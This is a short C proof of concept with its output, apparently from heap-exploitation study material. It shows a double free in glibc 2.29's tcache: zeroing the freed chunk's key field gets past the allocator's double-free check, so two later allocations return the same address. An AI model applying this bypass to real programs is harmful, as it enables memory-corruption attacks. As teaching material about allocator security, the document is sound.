glibc 2.29 tcache exploit

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(){
	uint64_t *ptr1 = malloc(0x20);
	fprintf(stderr,"Tcache ptr1: %p\n",ptr1);
	free(ptr1);
	fprintf(stderr,"Free ptr1\n");
	ptr1[1] = 0;
	fprintf(stderr,"Initialize ptr1[1]\n");
	fprintf(stderr,"Bypass (__glibc_unlikely (e->key == tcache))\n");
	free(ptr1);
	fprintf(stderr,"Double Free Finish\n");
	fprintf(stderr,"Allocate %p, %p\n",malloc(0x20),malloc(0x20));
}

Result

Tcache ptr1: 0x5610c215f260
Free ptr1
Initialize ptr1[1]
Bypass (__glibc_unlikely (e->key == tcache))
Double Free Finish
Allocate 0x5610c215f260, 0x5610c215f260